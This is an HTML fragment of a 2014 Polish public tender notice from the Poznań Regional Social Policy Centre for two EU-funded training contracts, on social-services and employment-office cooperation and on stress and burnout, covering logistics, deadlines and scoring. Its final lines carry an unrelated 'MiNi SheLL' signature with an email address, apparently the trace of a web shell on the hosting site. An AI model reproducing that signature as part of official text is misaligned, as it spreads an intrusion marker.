<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>zawarte są we wzorach umowy tj.: w Załączniku Nr 5.1. do SIWZ dla Części 1, Załączniku Nr 5.2. do SIWZ dla Części 2</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.rops.poznan.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 318.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 14.07.2014 godzina 09:00, miejsce: Regionalny Ośrodek Polityki Społecznej w Poznaniu, ul. Nowowiejskiego 11, 61-731 Poznań pok. 208 sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> świadczenie usług szkoleniowych w ramach projektu systemowego pn. Podnoszenie kwalifikacji kadr pomocy i integracji społecznej w Wielkopolsce, Działanie 7.1.3. Programu Operacyjnego Kapitał Ludzki współfinansowanego z Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Interdyscyplinarna współpraca pracowników pomocy społecznej 
i służb zatrudnienia - Aktywizacja osób bezrobotnych w ramach Programu Aktywizacja i Integracja.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: 
Celem szkolenia jest wyposażenie uczestników w wiedzę teoretyczną i praktyczne umiejętności współpracy pomiędzy powiatowymi urzędami pracy i ośrodkami pomocy społecznej na rzecz osób bezrobotnych skierowanych do realizacji  Programu Aktywizacja i Integracja.
Zakres tematyczny: 
a) Założenia programu Programu Aktywizacja i Integracja (zakres, czas realizacji, grupy docelowe);
b) Podstawy prawne  i źródła finansowania Programu Aktywizacja i Integracja ;
c) 3 modele realizacji Programu Aktywizacja i Integracja 
d)Role zadania instytucji zaangażowanych w realizację Programu Aktywizacja i Integracja;
d) Porozumienie o realizacji a porozumienie o współpracy w ramach Programu Aktywizacja 
i Integracja - różnice i korzyści dla OPS i PUP;
Sposób organizacji szkolenia: 
Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 5 edycji jednodniowych, 6-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 150 uczestników w podziale na grupy maksymalnie 30 osobowe wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu oraz wyżywienia. Zajęcia będą prowadzone przez minimum jednego szkoleniowca.
Materiały szkoleniowe: 
Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. Materiały powinny być przekazane do akceptacji w wersji ostatecznej. Jeden komplet materiałów Wykonawca przekaże Zamawiającemu w momencie podpisania umowy.
Rekrutacja i obsługa administracyjna: 
Zamawiający w zakresie naboru kandydatów na szkolenie i tworzenia listy uczestników:
- nawiązuje kontakt z jednostkami pomocy i integracji społecznej oraz powiatowymi urzędami pracy w Wielkopolsce i na podstawie otrzymanych zgłoszeń przeprowadza kwalifikację uczestników szkolenia oraz sporządza listę uczestników szkolenia,
- informuje kandydatów, o zakwalifikowaniu się na szkolenie,
- przekazuje listę kandydatów Wykonawcy w terminie dwóch dni przed terminem rozpoczęcia każdej edycji.
Wykonawca prowadzi działania wspierające działania Zamawiającego w formie ogłoszeń oraz informacji na własnej stronie internetowej. Mają one na celu promowanie szkolenia i informowanie o szkoleniu jednostki pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Miejsce szkolenia:
Wykonawca jest zobowiązany zorganizować pięć edycji szkolenia w pięciu miastach województwa wielkopolskiego tj. w  Poznaniu, Pile, Kaliszu, Lesznie oraz Koninie. Informacja o miejscach 
i terminach poszczególnych edycji zostanie przekazana Zamawiającemu nie później niż 5 dni przed podpisaniem umowy.
Sale szkoleniowe: 
Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: 
Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
- 2 serwisy konferencyjne składające się z kawy, herbaty, wody mineralnej, soków, owoców; np. jabłko lub banan, wyrobów cukierniczych,
- obiad dwudaniowy z napojem.
Ww. posiłki powinny być podawane w innej sali niż sala wykładowa, ale w tym samym budynku lub na terenie tego samego ośrodka lub hotelu.
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.1. do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.10.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie w prowadzeniu szkoleń z zakresu pracy z trudnym klientem w instytucjach pomocy i integracji społecznej lub/i instytucjach rynku pracy - 25</li>
<li>3. Doświadczenie zawodowe w pracy w instytucjach pomocy społecznej lub/i publicznych służbach zatrudnienia - 25</li>
<li>4. Doświadczenie w prowadzeniu szkoleń z zakresu współpracy ośrodków pomocy społecznej i powiatowych urzędów pracy - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia pod nazwą: Stres i wypalenie zawodowe.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Cel szkolenia: 
Celem szkolenia jest nabycie praktycznych umiejętności rozpoznawania objawów nadmiernego stresu, poznanie technik radzenia sobie ze stresem oraz zasad dbania o równowagę psychofizjologiczną 
w warunkach przepracowania.
Zakres tematyczny: 
Stres jako czynnik zaburzający równowagę psychofizyczną: fizjologia czasu, rytmy dobowe, kwartalne, roczne oraz ich wpływ na sprawność psychofizyczną i możliwości intelektualne człowieka, autodiagnoza własnego stanu: zmęczenie, przemęczenie, stres, wypalenie zawodowe, stresopochodne procesy psychologiczne i fizjologiczne, etapy reakcji stresowej, stres eufunkcjonalny 
i dysfunkcjonalny - poziom stresu a skuteczność funkcjonowania, stres doraźny a stres przewlekły, zarządzanie własną energią i jej regeneracja.
Rozwijanie w sobie odporności na stres: fizjologiczna odporność - dieta, kondycja fizyczna, psychologiczna odporność - zbalansowany styl życia, asertywny styl bycia.
Techniki kontroli stresu i rozładowujące napięcie: zmiany w systemie przekonań i nastawieniu do świata, zarządzanie czasem - redukcja stresu poprzez zwiększenie efektywności pracy, sztuka odpoczynku - nauka metod relaksacji, fizyczna redukcja stresu i głębokie oddychanie, kontrola napięcia mięśni, przegląd metod (np. technika relaksacji Jacobsona i trening autogenny Schultza), metody konstruktywnego reagowania na sytuacje stresowe, samo-hipnoza i autosugestia - fakty 
i mity.
Sposób organizacji szkolenia: 
Wykonawcy ubiegający się o realizację niniejszego zamówienia zobowiązują się zorganizować i przeprowadzić nie więcej niż 7 edycji trzydniowych, 21-godzinnych szkoleń (przy założeniu, że jedna godzina zajęć dydaktycznych to 45 minut), dla 120 uczestników w podziale na grupy maksymalnie 
20 osobowe wraz z zapewnieniem uczestnikom poszczególnych edycji dowozu, zakwaterowania oraz wyżywienia. 
Materiały szkoleniowe: 
Wykonawca zobowiązany jest zapewnić każdemu uczestnikowi materiały szkoleniowe wraz ze szczegółowym harmonogramem zajęć, w formie papierowej i na nośniku elektronicznym. Materiały szkoleniowe zostaną przekazane Zamawiającemu do akceptacji nie później niż 3 dni przed podpisaniem umowy. 
Rekrutacja i obsługa administracyjna: 
Współpraca z Zamawiającym w zakresie naboru kandydatów na szkolenie i tworzenie listy uczestników oznacza: nawiązanie kontaktu Wykonawcy z jednostkami pomocy i integracji społecznej w Wielkopolsce i na podstawie otrzymanych tą drogą zgłoszeń przeprowadzenie wstępnej kwalifikacji uczestników szkolenia oraz sporządzenie listy kandydatów na każdą edycję, przekazanie sporządzonej listy kandydatów Zamawiającemu w celu uzyskania jej akceptacji. Dostarczenie ww. listy musi nastąpić na 2 dni przed terminem rozpoczęcia każdej edycji szkolenia, poinformowanie kandydatów; po otrzymaniu od Zamawiającego akceptacji zgłoszonych uczestników, o zakwalifikowaniu się na szkolenie. 
Wykonawca dokonuje ww. czynności posługując się formularzami przygotowanymi przez Zamawiającego i z wykorzystaniem danych kontaktowych udostępnionych przez Zamawiającego (baza e-mail jednostek pomocy i integracji społecznej w Wielkopolsce).
Zamawiający prowadzi działania wspierające działania Wykonawcy w formie ogłoszeń, listów oraz informacji na stronie internetowej. Mają one na celu promowanie szkolenia i informowanie 
o szkoleniu jednostek pomocy społecznej w Wielkopolsce.
Organizacja szkolenia
Dojazd: 
Miejscem zbiórki uczestników szkolenia jest Dworzec Letni w Poznaniu, ul. Dworcowa 1.
Wykonawca jest zobowiązany zorganizować dojazd uczestników na każdą edycję: pierwszego dnia każdej edycji z miejsca zbiórki uczestników do miejsca, w którym realizowane będzie szkolenie oraz po zakończeniu edycji powrót na Dworzec Letni w Poznaniu. 
Zakwaterowanie: 
Wykonawca jest zobowiązany zapewnić zakwaterowanie uczestników szkolenia w pokojach 2 lub 1 osobowych, w hotelu trzygwiazdkowym lub ośrodku rekreacyjno - szkoleniowym spełniającym standard hotelu trzygwiazdkowego, położonym w woj. wielkopolskim, w tym w mieście Poznaniu. 
Sale szkoleniowe: 
Wykonawca powinien zapewnić uczestnikom szkolenia warunki do nauki w oparciu o zasady BHP. 
Wyżywienie: 
Wyżywienie powinno spełniać wymogi aktualnych wytycznych Instytutu Żywności i Żywienia, 
a dostarczane posiłki powinny zapewniać 100% całodziennego zapotrzebowania na energię i składniki odżywcze.
Wykonawca zobowiązany jest zapewnić uczestnikom podczas szkolenia: 
pierwszego dnia - obiad dwudaniowy z napojem oraz kolację integracyjną, drugiego dnia - śniadanie, obiad dwudaniowy z napojem, kolację, trzeciego dnia - śniadanie, obiad dwudaniowy z napojem, 
2 serwisy konferencyjne w każdym dniu szkolenia, 
Szczegółowy opis przedmiotu zamówienia zawarty jest w Załączniku nr 1.2. do SIWZ.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 55.11.00.00-4, 55.12.00.00-7, 55.30.00.00-3, 60.10.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 40</li>
<li>2. Doświadczenie w prowadzeniu szkoleń z zakresu zarządzania stresem i przeciwdziałania wypaleniu zawodowemu - 30</li>
<li>3. Doświadczenie zawodowe w pracy psychoterapeutycznej - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com